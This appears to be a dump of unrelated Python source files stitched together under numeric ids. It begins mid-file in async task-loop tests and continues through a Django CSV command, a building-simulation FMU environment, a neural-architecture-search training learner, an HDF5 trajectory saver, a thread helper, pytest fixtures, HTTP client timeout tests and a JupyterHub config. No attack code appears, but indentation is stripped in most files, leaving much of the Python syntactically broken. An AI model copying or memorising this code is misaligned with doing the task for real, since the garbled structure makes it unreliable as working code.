self.counter += 1
count()
ev = AsyncEventLoop()
with ev:
count()
ev.execute_all_tasks()
self.assertEqual(4, self.counter)
def test_finally_with_err_subtask(self):
@task
def count():
self.counter += 1
@count.do_finally
def count():
self.counter += 1
@task
def err():
raise RuntimeError("Test")
@err.do_finally
def err():
self.counter += 1
err()
ev = AsyncEventLoop()
with ev:
count()
ev.execute_all_tasks()
self.assertEqual(3, self.counter)
def test_except_with_err_subtask(self):
@task
def count():
self.counter += 1
@count.do_finally
def count():
self.counter += 1
@task
def err():
raise RuntimeError("Test")
@err.do_except
def err(err):
if isinstance(err, RuntimeError):
self.counter += 1
err()
ev = AsyncEventLoop()
with ev:
count()
ev.execute_all_tasks()
self.assertEqual(3, self.counter)
def test_finally_reraise_subtask(self):
@task
def count():
self.counter += 1
@count.do_finally
def count():
self.counter += 1
@task
def err():
raise RuntimeError("Test")
@err.do_except
def err(err):
if isinstance(err, RuntimeError):
self.counter += 1
raise err
err()
ev = AsyncEventLoop()
with ev:
count()
ev.execute_all_tasks()
self.assertEqual(3, self.counter)
def test_finally_reraise_catch_subtask(self):
@task
def count():
self.counter += 1
@count.do_finally
def count():
self.counter += 1
@task
def err():
raise RuntimeError("Test")
@err.do_except
def err(err):
if isinstance(err, RuntimeError):
self.counter += 1
raise err
err()
@task
def main():
            self.counter += 1
count()
@main.do_except
def main(err):
self.counter += 1
ev = AsyncEventLoop()
with ev:
main()
ev.execute_all_tasks()
self.assertEqual(5, self.counter)
def test_finally_reraise_catch_finally_subtask(self):
@task
def count():
self.counter += 1
@count.do_finally
def count():
self.counter += 1
@task
def err():
raise RuntimeError("Test")
@err.do_except
def err(err):
if isinstance(err, RuntimeError):
self.counter += 1
raise err
err()
@task
def main():
            self.counter += 1
count()
@main.do_except
def main(err):
self.counter += 1
@main.do_finally
def main():
self.counter += 1
ev = AsyncEventLoop()
with ev:
main()
ev.execute_all_tasks()
self.assertEqual(6, self.counter)
def test_except_and_finally_raise(self):
@task
def raises():
raise RuntimeError("Error")
@raises.do_except
def raises(err):
raise err
@raises.do_finally
def raises():
raise ValueError("Finally wins")
@task
def main():
raises()
@main.do_except
def main(err):
if isinstance(err, ValueError):
self.except_called = True
elif isinstance(err, RuntimeError):
self.except_called = False
ev = AsyncEventLoop()
with ev:
main()
ev.execute_all_tasks()
self.assertTrue(self.except_called)
def test_cancel_before_except(self):
@task
def raises():
raise RuntimeError("Error")
@task
def main():
raises()
self.count()
self.count()
@main.do_except
def main(err):
self.counter += 1
ev = AsyncEventLoop()
with ev:
main()
ev.execute_all_tasks()
self.assertEqual(1, self.counter)
def test_cancel_except_finally(self):
@task
def raises():
raise RuntimeError("Error")
@task
def other():
self.counter -= 1
@other.do_except
def other(err):
if isinstance(err, CancellationError):
self.counter += 1
@other.do_finally
def other():
self.counter += 1
@task
def main():
raises()
other()
@main.do_except
def main(err):
self.counter += 1
ev = AsyncEventLoop()
with ev:
main()
ev.execute_all_tasks()
self.assertEqual(3, self.counter)
def test_future(self):
future = BaseFuture()
@task
def other():
future.set_result(1)
@task
def main():
other()
ev = AsyncEventLoop()
with ev:
main()
ev.execute_all_tasks()
self.assertEqual(1, future.result())
def test_future_with_task(self):
future = BaseFuture()
def count():
            self.counter += 1
@task
def other():
future.set_result(1)
@task
def main():
other()
ev = AsyncEventLoop()
with ev:
future.add_task(AsyncTask(count))
main()
ev.execute_all_tasks()
self.assertEqual(1, future.result())
self.assertEqual(1, self.counter)
if __name__ == '__main__':
unittest.main()
|
497837 | import csv
from django.core.management.base import BaseCommand
from api.models import Country, District
from django.db import transaction
from django.core.exceptions import ObjectDoesNotExist, MultipleObjectsReturned
class Command(BaseCommand):
help = 'Maps some orphan districts to countries. join_districts_to_country.csv is required (Johnny)'
missing_args_message = "Filename is missing. A valid CSV file is required."
def add_arguments(self, parser):
parser.add_argument('filename', nargs='+', type=str)
@transaction.atomic
def handle(self, *args, **options):
filename = options['filename'][0]
rows = csv.DictReader(open(filename, 'r'), fieldnames=['District code', 'Country ISO'])
next(rows)
for row in rows:
dcode = row['District code']
iso = row['Country ISO']
try:
country = Country.objects.get(iso=iso, record_type=1)
district = District.objects.get(code=dcode)
district.country = country
district.country_name = country.name
district.country_iso = country.iso
district.save()
except ObjectDoesNotExist:
print(f'Missing Country ({iso}) or District ({dcode})')
except MultipleObjectsReturned:
print(f'More than one Country with ({iso}) or District with ({dcode})')
print('Done!')
|
497855 | import logging
import os
from energym.envs.env_fmu import EnvFMU
from energym.envs.utils.weather import MOS
from energym.envs.weather_names import WEATHERNAMES
import energym
logger = logging.getLogger(__name__)
class EnvModFMU(EnvFMU):
"""Base class for Modelica based FMU simulation models.
Subclasses EnvFMU and inherits its behavior. Defines Modelica
specific simulation details.
Methods
--------
set_model_variables(variables, values)
Sets value of model variables (Modelica).
get_variable_data(list_vars)
Retrieves data for a list of variables.
"""
def __init__(
self,
model_path,
start_time,
stop_time,
step_size,
weather,
params,
init_vals,
input_specs,
output_specs,
kpi_options,
default_path=True,
generate_forecasts=True,
generate_forecast_method="perfect",
generate_forecast_keys=None,
):
"""
Parameters
----------
model_path : str
Specifies the path to the FMU
start_time : int
Begin of the simulation time in seconds in relation to the
beginning of the year
stop_time : int
End of the simulation time in seconds in relation to the
beginning of the year
step_size : float
Length of a simulation timestep in seconds
weather : str
Specifies the used weather file
input_specs : dict
Contains the inputs of the model
output_specs : dict
Contains the outputs of the model
kpi_options : dict
Dict to specify the tracked KPIs.
default_path : bool, optional
Whether to use the default path or an absolute path in model_path and weather
Raises
------
Exception
If the passed weather file is not contained in the list of
available weather files
"""
self.params = params
if default_path:
path = os.path.abspath(energym.__file__)
path = os.path.abspath(os.path.join(path, "..", ".."))
fmu_file = os.path.join(
path,
"simulation",
"modelica",
model_path + ".fmu",
)
else:
fmu_file = model_path
if weather is None:
super().__init__(
fmu_file,
start_time,
stop_time,
step_size,
weather,
input_specs,
output_specs,
kpi_options,
default_path,
)
self.look_for_weather_file()
else:
weather_mos = MOS()
if default_path:
if weather in WEATHERNAMES:
weather_file = os.path.join(
path,
"simulation",
"modelica",
model_path.split(os.sep)[0],
"wf",
WEATHERNAMES[weather] + ".mos",
)
weather_mos.read(
weather_file,
generate_forecasts,
generate_forecast_method,
generate_forecast_keys,
)
else:
raise Exception("Unknown weather file")
else:
weather_file = weather
weather_mos.read(
weather,
generate_forecasts,
generate_forecast_method,
generate_forecast_keys,
)
super().__init__(
fmu_file,
start_time,
stop_time,
step_size,
weather_mos,
input_specs,
output_specs,
kpi_options,
default_path,
weather_file,
)
self.init_vals = {key: init_vals[key] for key in self.input_keys}
print("the initial variables are", self.init_vals)
self.set_model_variables(list(params.keys()), list(params.values()))
self.set_model_variables(
list(self.init_vals.keys()), list(self.init_vals.values())
)
def set_model_variables(self, variables, values):
"""Sets value of model variables.
Parameters
----------
variables: str or list
list of variables to set
values: str or list
list of values to set
"""
if self.is_fmu_initialized:
logger.warning(
"FMU is already initialized. Values set may not be propagated in model as expected."
)
if isinstance(variables, str):
self.set_model_variables([variables], [values])
elif isinstance(variables, list):
self.fmu.setReal([self.vrs[v] for v in variables], values)
else:
TypeError("variables should be list of str")
def get_variable_data(self, list_vars):
"""Retrieves data for a list of variables.
Parameters
----------
list_vars : list
List of variables to retrieve. Variables can be outputs of the model or internal variables.
Returns
-------
dict
Dictionary with values for the variables.
"""
# get the values
out_values = self.fmu.getReal([self.vrs[key] for key in list_vars])
res = [(self.time, out_values)]
return self.post_process(list_vars, res)
def get_output(self):
out = self.fmu.getReal([self.vrs[key] for key in self.output_keys])
res = [(self.time, out)]
output = self.post_process(self.output_keys, res, arrays=False)
return output
def reset(self):
super().reset()
self.set_model_variables(list(self.params.keys()), list(self.params.values()))
self.set_model_variables(
list(self.init_vals.keys()), list(self.init_vals.values())
)
|
497856 | import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
# from tensorboardX import SummaryWriter
import os
import logging
from utils.utils import *
from utils.compute_flops import lookup_table_flops
from utils.transfer_archs import decode_cfg
import torch.distributed as dist
from utils.dist_utils import *
import time
import pickle
from pdb import set_trace as br
class Architect(nn.Module):
def __init__(self, model, args):
super(Architect, self).__init__()
self.args = args
self.model = model
# flops table loaded inside the learner
self.optimizer = torch.optim.Adam(list(self.model.arch_parameters()),
lr=args.arch_learning_rate, betas=(0.5, 0.999),
weight_decay=args.arch_weight_decay)
self.baseline = torch.tensor(0.).cuda()
self.gamma = args.gamma
def update_baseline(self, reward_raw):
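        # Exponential moving average of the raw reward, used as the REINFORCE-style
        # baseline to reduce the variance of the policy-gradient update.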
self.baseline = self.baseline * self.gamma + reward_raw * (1-self.gamma)
def step(self, archs_logP, reduced_acc1, archs_entropy, arch_tmp):
# NOTE: only update rl agent on rank 0
policy_loss, reward_raw = self.model._loss_arch(archs_logP, reduced_acc1, archs_entropy, arch_tmp, self.baseline)
if self.args.rank == 0:
self.optimizer.zero_grad()
policy_loss.backward()
self.optimizer.step()
self.update_baseline(reward_raw)
if self.args.distributed:
# sync baseline and arch master
dist.barrier()
dist.broadcast(self.baseline, 0)
broadcast_params(self.model.arch_master)
# check passed. params are the same on multiple GPU
return reward_raw
class ChannIlsvrcLearner(object):
def __init__(self, model, loaders, args, device):
self.args = args
self.device = device
self.model = model
self.proj_lr = 0. # initially do not change P,Q
self.__build_path()
self.train_loader, self.test_loader = loaders
# self.writer = SummaryWriter(os.path.dirname(self.save_path))
self.__build_learner()
def __build_learner(self):
# split variables to weights and arch_params
self.__setup_optim()
self.architect = Architect(self.model, self.args)
self.criterion = nn.CrossEntropyLoss().cuda()
def train(self, samplers):
train_sampler = samplers
self.model.arch_master.force_uniform = True # initially random sample for warmup
for epoch in range(self.args.epochs):
if self.args.distributed:
assert train_sampler is not None
train_sampler.set_epoch(epoch)
if epoch > self.args.warmup_epochs:
self.model.arch_master.force_uniform = False
if self.args.ft_schedual == 'follow_meta':
self.proj_opt.param_groups[0]['lr'] = self.proj_opt.param_groups[0]['lr'] # 0.001
elif self.args.ft_schedual == 'fixed':
self.proj_opt.param_groups[0]['lr'] = self.args.ft_proj_lr
else:
                raise ValueError('Wrong Projection Finetuning Type!')
self.model.train()
if self.check_is_primary():
logging.info("Training at Epoch: %d" % epoch)
train_acc, train_loss = self.epoch_train(epoch)
if self.lr_scheduler:
self.lr_scheduler.step()
            # in the ilsvrc learner we warm up in advance, so no (epoch > self.args.warmup_epochs) check is needed here
if (epoch + 1) % self.args.eval_epoch == 0:
if self.check_is_primary():
self.save_model()
logging.info("Evaluation at Epoch: %d" % epoch)
if (epoch + 1) == self.args.epochs//2 and self.args.warmup_epochs == self.args.epochs:
# NOTE: store a 0.1 lr model separately
self.save_model('model_0.1.pt')
logging.info("Init lr model saved")
if self.args.distributed:
dist.barrier()
self.evaluate(True, epoch)
def finetune(self, samplers):
train_sampler = samplers
self.load_model()
self.evaluate(True, 0)
for epoch in range(self.args.epochs):
if self.args.distributed:
assert train_sampler is not None
train_sampler.set_epoch(epoch)
if epoch > self.args.warmup_epochs:
self.model.arch_master.force_uniform = False
if self.args.ft_schedual == 'follow_meta':
self.proj_opt.param_groups[0]['lr'] = self.proj_opt.param_groups[0]['lr'] # 0.001
elif self.args.ft_schedual == 'fixed':
self.proj_opt.param_groups[0]['lr'] = self.args.ft_proj_lr
else:
                raise ValueError('Wrong Projection Finetuning Type!')
self.model.train()
if self.check_is_primary():
logging.info("Finetuning at Epoch: %d" % epoch)
ft_acc, ft_loss = self.epoch_train(epoch)
if self.lr_scheduler:
self.lr_scheduler.step()
if (epoch + 1) % self.args.eval_epoch == 0:
if self.check_is_primary():
self.save_model()
logging.info("Evaluation at Epoch: %d" % epoch)
if self.args.distributed:
dist.barrier()
self.evaluate(True, epoch)
def evaluate(self, is_train=False, epoch=None):
self.model.eval()
if self.args.distributed:
sync_bn_stat(self.model, self.args.world_size)
if not is_train:
self.load_model()
with torch.no_grad():
if self.args.beam_search:
self.beam_search_eval()
# self.epoch_eval(epoch)
else:
self.epoch_eval(epoch)
def misc(self):
# check ilsvrc data
total_idx = len(self.train_loader)
for idx, (data_train, data_valid) in enumerate(zip(self.train_loader, self.valid_loader)):
input_x, target_y = data_train[0].to(self.device), data_train[1].to(self.device)
input_search, target_search = data_valid[0].to(self.device), data_valid[1].to(self.device)
if idx % 100 == 0:
print("Reading... %.2f complete" % float(idx/total_idx))
print("All input passed")
def epoch_train(self, epoch):
""" Rewrite this function if necessary in the sub-classes. """
# setup statistics
batch_time = AverageMeter('Time', ':3.3f')
# data_time = AverageMeter('Data', ':6.3f')
lr = AverageMeter('Lr', ':.3e')
losses = AverageMeter('Loss', ':.4e')
losses_ce = AverageMeter('Loss_ce', ':.4e')
losses_proj = AverageMeter('Loss_proj', ':.4e')
# penalty = AverageMeter('Penalty', ':.4e')
# flops = AverageMeter('Decode FLOPs', ':.4e')
rewards = AverageMeter('Controller reward', ':.4e')
entropy = AverageMeter('Entropy', ':.4e')
top1 = AverageMeter('Acc@1', ':3.3f')
top5 = AverageMeter('Acc@5', ':3.3f')
metrics = [lr, batch_time, top1, top5, losses, losses_ce, losses_proj, rewards, entropy]
loader_len = len(self.train_loader)
progress = ProgressMeter(loader_len, *metrics, prefix='Job id: %s, ' % self.args.job_id)
end = time.time()
for idx, data_train in enumerate(self.train_loader):
input_x, target_y = data_train[0].to(self.device), data_train[1].to(self.device)
logits, archs_logP, archs_entropy, arch_tmp = self.model(input_x)
# check passed: archs are all the same across multiple GPUS.
# NOTE: archs_entropy and logP may be different, but we only update
# arch_master on rank==0.
loss_ce = self.criterion(logits, target_y) / self.args.world_size
acc1, acc5 = accuracy(logits, target_y, topk=(1, 5))
reduced_loss_ce = loss_ce.data.clone()
reduced_acc1 = acc1.clone() / self.args.world_size
reduced_acc5 = acc5.clone() / self.args.world_size
if self.args.distributed:
dist.all_reduce(reduced_loss_ce)
dist.all_reduce(reduced_acc1)
dist.all_reduce(reduced_acc5)
# NOTE: policy_loss and loss_ce, loss_proj are w.r.t different graphs.
# Therefore freeing graph for policy_loss does not affect loss_ce
            # and loss_proj.
# update alpha on validation set after warmup
if epoch > self.args.warmup_epochs:
reward_raw = self.architect.step(archs_logP, reduced_acc1, archs_entropy, arch_tmp)
rewards.update(reward_raw.item(), n=1)
entropy.update(archs_entropy.item(), n=1)
# update meta and projection weights
self.opt.zero_grad()
loss_ce.backward()
if self.args.distributed:
average_group_gradients(self.model.meta_parameters())
self.opt.step()
if idx % self.args.updt_proj == 0:
                # NOTE: now we update the orthogonal loss separately inside
loss_proj = self.model.updt_orthogonal_reg_loss(self.proj_opt) # return a python scalar
            # project back to unit length after warmup
if self.args.norm_constraint == 'constraint' and self.proj_opt.param_groups[0]['lr'] > 0:
for k, v in self.model.named_projection_parameters():
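                    # Renormalise each column of the projection matrix back to
                    # unit L2 norm after the update.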
v_sum = v.transpose(1, 0).mm(v).sqrt().diag()
v_sum = v_sum.repeat(v.size(0), 1)
v.data = (v / v_sum).data
elif self.args.norm_constraint != 'constraint':
raise ValueError
# update statistics
top1.update(reduced_acc1[0].item(), input_x.shape[0])
top5.update(reduced_acc5[0].item(), input_x.shape[0])
losses.update(loss_proj+reduced_loss_ce.item(), input_x.shape[0])
losses_ce.update(reduced_loss_ce.item(), input_x.shape[0])
losses_proj.update(loss_proj, input_x.shape[0])
lr.update(self.opt.param_groups[0]['lr'])
batch_time.update(time.time() - end)
end = time.time()
# show the training/evaluating statistics
if self.check_is_primary() and ((idx % self.args.print_freq == 0) or (idx + 1) % loader_len == 0):
progress.show(idx)
return top1.avg, losses.avg
def beam_search_eval(self, epoch=None):
best_acc = -np.inf
# best_loss = np.inf
best_arch_logP = None
best_arch_ent = None
best_arch = None
best_logits = None
beam_size = self.args.top_seq
cand_seq, logits_seq, logP_accum, entropy_accum = self.model.arch_master.beam_search(beam_size)
if self.args.distributed:
dist.broadcast(cand_seq, 0)
            # NOTE: archs_seq are the same, no need to broadcast
# print(self.args.rank, logits_seq[0])
# dist.broadcast(logits_seq, 0)
dist.broadcast(logP_accum, 0)
dist.broadcast(entropy_accum, 0)
parallel_eval = True if self.args.distributed and beam_size%self.args.world_size==0 and not self.args.fix_random \
else False
if parallel_eval:
idx = 0
while idx < beam_size:
top1 = AverageMeter('cand top1', ':3.3f')
arch_id = idx + self.args.rank
cand = cand_seq[arch_id]
# arch = [self.model.candidate_width[v] for v in cand]
# print("On rank: %d, Evaluating the %d-th arch, archs: %s" % (self.args.rank, arch_id, str(cand)))
print("On rank: %d, %d-th Arch: %s" % (self.args.rank, arch_id, \
decode_cfg(self.args, cand, self.model.num_blocks, self.model.block_layer_num)))
# NOTE: comment this for fast eval
for test_input, test_target in self.test_loader:
test_input, test_target = test_input.to(self.device), test_target.to(self.device)
logits = self.model.test_forward(test_input, cand)
acc = accuracy(logits, test_target)[0]
top1.update(acc.item(), test_input.size(0))
flops = self.model.arch_master._compute_flops(cand)
# print all the sampled archs in parallel
print("Rank: %d, Arch id:%d, Acc:%.3f, log P:%.4e, entropy:%.4e, flops:%e" % \
(self.args.rank, arch_id, top1.avg, logP_accum[arch_id].item(), entropy_accum[arch_id].item(), flops))
# init group vars to be gathered
top1 = torch.tensor(top1.avg).float().cuda()
g_top1 = [torch.ones_like(top1) for _ in range(self.args.world_size)]
# collect results on different GPUs
dist.all_gather(g_top1, top1)
if self.check_is_primary():
max_ind = np.argmax(g_top1)
if g_top1[max_ind] > best_acc:
best_acc = g_top1[max_ind]
best_arch = cand
best_arch_logP = logP_accum[idx+max_ind].item()
best_arch_ent = entropy_accum[idx+max_ind].item()
idx += self.args.world_size
else:
if self.check_is_primary():
for idx, cand in enumerate(cand_seq):
# enumerate over each cand arch and perform testing
top1 = AverageMeter('cand top1', ':3.3f')
# NOTE: comment this for fast eval
for test_input, test_target in self.test_loader:
test_input, test_target = test_input.to(self.device), test_target.to(self.device)
logits = self.model.test_forward(test_input, cand)
acc = accuracy(logits, test_target)[0]
top1.update(acc.item(), test_input.size(0))
flops = self.model.arch_master._compute_flops(cand)
# print all the sampled archs on primary rank
print("%d-th Arch: %s" % (idx, decode_cfg(self.args, cand, self.model.num_blocks, self.model.block_layer_num)))
print("Arch id:%d, Acc:%.3f, log P:%.4e, entropy:%.4e, flops:%e" % \
(idx, top1.avg, logP_accum[idx].item(), entropy_accum[idx].item(), flops))
if top1.avg > best_acc:
best_acc = top1.avg
best_arch = cand
best_arch_logP = logP_accum[idx].item()
best_arch_ent = entropy_accum[idx].item()
if self.check_is_primary() and self.model.num_cand> 1:
avg_logits = [torch.stack(logits) for logits in logits_seq]
avg_logits = torch.stack(avg_logits).mean(0)
avg_arch_info, avg_discrepancy = self.model.get_arch_info(avg_logits)
print(avg_arch_info)
logging.info("Best: Accuracy %f -LogP %f ENT %f",best_acc, -best_arch_logP, best_arch_ent)
logging.info("Best Arch: %s" % str(best_arch))
logging.info("Beam search done. size: %d" % beam_size)
# sync back
if self.args.distributed:
dist.barrier()
def epoch_eval(self, epoch):
best_acc = -np.inf
# best_loss = np.inf
best_arch_logP = None
best_arch_ent = None
best_arch = None
avg_logits_list = []
parallel_eval = True if self.args.distributed and \
self.args.n_test_archs % self.args.world_size == 0 and not self.args.fix_random \
else False
if parallel_eval:
            # NOTE: a new parallel way to perform evaluation with different archs
if self.check_is_primary():
logging.info("Now parallel evaluating different archs")
idx = 0
while (idx<self.args.n_test_archs):
top1, arch_cand, arch_logP, arch_entropy, arch_info, discrepancy = self.model.test_cand_arch(self.test_loader)
flops = self.model.arch_master._compute_flops(arch_cand)
# logging.info("Rank:%d, Arch id:%d, %s, Acc:%.3f, log P:%.4e, entropy:%.4e, flops:%e" % \
# (self.args.rank, idx+self.args.rank, str(arch_cand.tolist()), top1, arch_logP.item(), arch_entropy.item(), flops)) # print all the sampled archs
print("Rank:%d, Arch id:%d, %s, Acc:%.3f, log P:%.4e, entropy:%.4e, flops:%e" % \
(self.args.rank, idx+self.args.rank, str(arch_cand.tolist()), top1, arch_logP.item(), arch_entropy.item(), flops)) # print all the sampled archs
dist.barrier()
idx += self.args.world_size
top1 = torch.tensor(top1).float().cuda()
# init group vars to be gathered
g_top1 = [torch.ones_like(top1) for _ in range(self.args.world_size)]
g_logits = [torch.ones_like(self.model.logits) for _ in range(self.args.world_size)]
g_arch_cand = [torch.ones_like(arch_cand) for _ in range(self.args.world_size)]
g_entropy = [torch.ones_like(arch_entropy) for _ in range(self.args.world_size)]
g_arch_logP = [torch.ones_like(arch_logP) for _ in range(self.args.world_size)]
# collect results on different GPUs
dist.all_gather(g_top1, top1)
dist.all_gather(g_arch_logP, arch_logP)
dist.all_gather(g_entropy, arch_entropy)
dist.all_gather(g_arch_cand, arch_cand)
dist.all_gather(g_logits, self.model.logits)
if self.check_is_primary():
avg_logits_list += g_logits
max_ind = np.argmax(g_top1)
if g_top1[max_ind] > best_acc:
best_acc = g_top1[max_ind]
best_arch = g_arch_cand[max_ind]
best_arch_logP = g_arch_logP[max_ind]
best_arch_ent = g_entropy[max_ind]
dist.barrier()
else:
if self.check_is_primary():
# sample 20 archs and take the best one.
logging.info("Single model evluating...")
for i in range(self.args.n_test_archs):
top1, arch_cand, arch_logP, arch_entropy, arch_info, discrepancy = self.model.test_cand_arch(self.test_loader)
flops = self.model.arch_master._compute_flops(arch_cand)
logging.info("Arch: %s", decode_cfg(self.args, arch_cand, self.model.num_blocks, self.model.block_layer_num))
logging.info("Arch id:%d, %s, Acc:%.3f, log P:%.4e, entropy:%.4e, flops:%e" % \
(i, str(arch_cand.tolist()), top1, arch_logP.item(), arch_entropy.item(), flops)) # print all the sampled archs
avg_logits_list.append(self.model.logits)
if top1 > best_acc:
best_acc = top1
best_arch = arch_cand
best_arch_logP = arch_logP
best_arch_ent = arch_entropy
if self.check_is_primary() and self.model.num_cand > 1:
avg_logits = torch.stack(avg_logits_list)
avg_arch_info, avg_discrepancy = self.model.get_arch_info(avg_logits.mean(0))
print(avg_arch_info)
logging.info("Best: Accuracy %f -LogP %f ENT %f",best_acc,
-best_arch_logP, best_arch_ent)
logging.info("Best Arch: %s", decode_cfg(self.args, best_arch, self.model.num_blocks, self.model.block_layer_num))
logging.info("Random sample evaluation done.")
# sync back
if self.args.distributed:
dist.barrier()
def __setup_optim(self):
""" Set up optimizer for network parameters and projection matrix seperately (not arch parameters) """
self.opt = optim.SGD(self.model.meta_parameters(), lr=self.args.lr, momentum=self.args.momentum, \
nesterov=self.args.nesterov, weight_decay=self.args.weight_decay)
self.proj_opt = optim.SGD(self.model.projection_parameters(), lr=self.proj_lr, momentum=self.args.momentum, \
nesterov=self.args.nesterov, weight_decay=self.args.weight_decay)
# proj_lr is adjusted in self.train()
if self.args.lr_decy_type == 'multi_step':
self.lr_scheduler = optim.lr_scheduler.MultiStepLR(self.opt, milestones=[\
int(self.args.epochs * 0.5), int(self.args.epochs * 0.75)])
elif self.args.lr_decy_type == 'cosine':
self.lr_scheduler = optim.lr_scheduler.CosineAnnealingLR(\
self.opt, self.args.epochs, eta_min=self.args.lr_min)
else:
raise ValueError("Unknown model, failed to initalize optim")
def __build_path(self):
if self.args.exec_mode == 'train':
self.save_path = os.path.join(self.args.save_path,
'_'.join([self.args.model_type, self.args.learner]),
self.args.job_id, 'model.pt')
self.load_path = self.save_path
elif self.args.exec_mode == 'finetune':
self.load_path = self.args.load_path
if self.args.warmup_epochs == self.args.epochs:
# further warmup with decayed learning rate
self.save_path = os.path.join(os.path.dirname(self.load_path), 'model_ft_%s.pt' % self.args.job_id)
else:
self.save_path = os.path.join(os.path.dirname(self.load_path), 'model_search_%s.pt' % self.args.job_id)
else:
self.load_path = self.args.load_path
self.save_path = self.load_path
def check_is_primary(self):
if (self.args.distributed and self.args.rank == 0) or \
not self.args.distributed:
return True
else:
return False
def save_model(self, file_name=None):
if file_name is None:
file_name = self.save_path
else:
file_name = os.path.join(os.path.dirname(self.save_path), file_name)
state = {'state_dict': self.model.state_dict(), \
'optimizer': self.opt.state_dict(), \
'arch_optimizer': self.architect.optimizer.state_dict()}
torch.save(state, file_name)
logging.info("Model stored at: " + file_name)
def load_model(self):
if self.args.distributed:
            # read parameters to each GPU separately
loc = 'cuda:{}'.format(torch.cuda.current_device())
checkpoint = torch.load(self.load_path, map_location=loc)
else:
checkpoint = torch.load(self.load_path)
self.model.load_state_dict(checkpoint['state_dict'])
        # NOTE: for warmup, it is useless to restore optimizer params.
# self.opt.load_state_dict(checkpoint['optimizer'])
# self.architect.optimizer.load_state_dict(checkpoint['arch_optimizer'])
logging.info("Model succesfully restored from %s" % self.load_path)
if self.args.distributed:
broadcast_params(self.model)
|
497865 | import numpy as np
import pdb
import h5py
import os
import matplotlib
matplotlib.use('agg')
import matplotlib.pyplot as plt
from recursive_planning.infra.datasets.save_util.record_saver import HDF5SaverBase
from utils import AttrDict
def pad_traj_timesteps(traj, max_num_actions):
"""
pad images and actions with zeros
:param traj:
:param max_num_actions:
:return:
"""
im_shape = traj.images.shape
ac_shape = traj.actions.shape
if ac_shape[0] < max_num_actions:
zeros = np.zeros([max_num_actions - im_shape[0] + 1, im_shape[1], im_shape[2], im_shape[3], im_shape[4]], dtype=np.uint8)
traj.images = np.concatenate([traj.images, zeros])
if len(ac_shape) > 1:
zeros = np.zeros([max_num_actions - ac_shape[0], ac_shape[1]])
else:
zeros = np.zeros([max_num_actions - ac_shape[0]])
traj.actions = np.concatenate([traj.actions, zeros])
assert traj.images.shape[0] == max_num_actions + 1
assert traj.actions.shape[0] == max_num_actions
return traj
def get_pad_mask(action_len, max_num_actions):
"""
create a 0/1 mask with 1 where there are images and 0 where there is padding
:param action_len: the number of actions in trajectory
:param max_num_actions: maximum number of actions allowed
:return:
"""
if action_len < max_num_actions:
mask = np.concatenate([np.ones(action_len + 1), np.zeros(max_num_actions - action_len)])
elif action_len == max_num_actions:
mask = np.ones(max_num_actions + 1)
else:
raise ValueError
assert mask.shape[0] == max_num_actions + 1
return mask
class HDF5Saver(HDF5SaverBase):
def __init__(self, save_dir, envparams, agentparams, traj_per_file,
offset=0, split=(0.90, 0.05, 0.05), split_train_val_test=True):
        if hasattr(envparams, 'max_num_actions'):
self.max_num_actions = envparams.max_num_actions
else:
self.max_num_actions = agentparams.T
super().__init__(save_dir, traj_per_file, offset, split, split_train_val_test)
def _save_manifests(self, agent_data, obs, policy_out):
pass
def make_traj(self, obs, policy_out):
traj = AttrDict()
traj.images = obs['images']
traj.states = obs['state']
action_list = [action['actions'] for action in policy_out]
traj.actions = np.stack(action_list, 0)
traj.pad_mask = get_pad_mask(traj.actions.shape[0], self.max_num_actions)
traj = pad_traj_timesteps(traj, self.max_num_actions)
return traj
def save_traj(self, itr, agent_data, obs, policy_out):
traj = self.make_traj(obs, policy_out)
self._save_traj(traj) |
497875 | import os, threading, abc, time
class TimedIterateThread(threading.Thread, metaclass=abc.ABCMeta):
def __init__(self, iter_sleep = None):
super(TimedIterateThread, self).__init__()
self.exit = threading.Event()
self.iter_sleep = iter_sleep
@abc.abstractmethod
def iterate(self):
pass
@abc.abstractmethod
def cleanup(self):
pass
def run(self):
while not self.exit.is_set():
self.iterate()
if self.iter_sleep is not None:
time.sleep(self.iter_sleep)
self.cleanup()
def shutdown(self):
self.exit.set()
self.join()
def create_log_directory(log_directory):
# Log directory might refer to ~
log_directory = os.path.expanduser(log_directory)
if not os.path.exists(log_directory):
print "Creating %s" % log_directory
os.makedirs(log_directory)
for sub_directory in ["node_coordinators", "run_logs"]:
directory = os.path.join(log_directory, sub_directory)
if not os.path.exists(directory):
print "Creating %s" % directory
os.makedirs(directory)
return log_directory
def create_batch_directory(log_directory, batch_id):
batch_directory = os.path.join(
log_directory, "run_logs", "batch_%d" % batch_id)
if not os.path.exists(batch_directory):
os.makedirs(batch_directory)
return batch_directory
|
497895 | import pytest
from studying.shipment import RecordShipment
pytestmark = [pytest.mark.django_db]
@pytest.fixture
def course(mixer):
return mixer.blend('products.Course', name='Кройка и шитьё', name_genitive='Кройки и шитья')
@pytest.fixture
def record(mixer, course):
return mixer.blend('products.Record', course=course)
@pytest.fixture
def order(factory, record):
return factory.order(item=record)
@pytest.fixture
def shipment(user, record, order):
return RecordShipment(user=user, product=record, order=order)
|
497912 | from invoke import run
def print_and_run(cmd, **run_kwargs):
print(cmd)
return run(cmd, **run_kwargs)
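if __name__ == "__main__":
    # Minimal usage sketch: echoes the command before invoke executes it.
    print_and_run("echo hello")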
|
497926 | import pytest
from blacksheep.client import ClientSession, ConnectionTimeout, RequestTimeout
from . import FakePools
@pytest.mark.asyncio
async def test_connection_timeout():
fake_pools = FakePools([])
fake_pools.pool.sleep_for = (
5 # wait for 5 seconds before returning a connection; to test timeout handling
)
async with ClientSession(
base_url=b"http://localhost:8080",
pools=fake_pools,
connection_timeout=0.002, # 2ms - not realistic, but ok for this test
) as client:
with pytest.raises(ConnectionTimeout):
await client.get(b"/")
@pytest.mark.asyncio
async def test_request_timeout():
fake_pools = FakePools([])
fake_pools.pool.connection.sleep_for = (
5 # wait for 5 seconds before returning a response;
)
async with ClientSession(
base_url=b"http://localhost:8080",
pools=fake_pools,
request_timeout=0.002, # 2ms - not realistic, but ok for this test
) as client:
with pytest.raises(RequestTimeout):
await client.get(b"/")
|
497936 | import os
c = get_config()
c.JupyterHub.spawner_class = 'marathonspawner.MarathonSpawner'
c.JupyterHub.ip = '0.0.0.0'
c.JupyterHub.hub_ip = '0.0.0.0'
c.JupyterHub.cmd = 'start-singleuser.sh'
c.JupyterHub.cleanup_servers = False
c.MarathonSpawner.app_prefix = 'jupyter'
c.MarathonSpawner.app_image = 'jupyterhub/singleuser'
c.MarathonSpawner.marathon_host = 'http://leader.mesos:8080'
c.MarathonSpawner.ports = [8000]
c.MarathonSpawner.mem_limit = '2G'
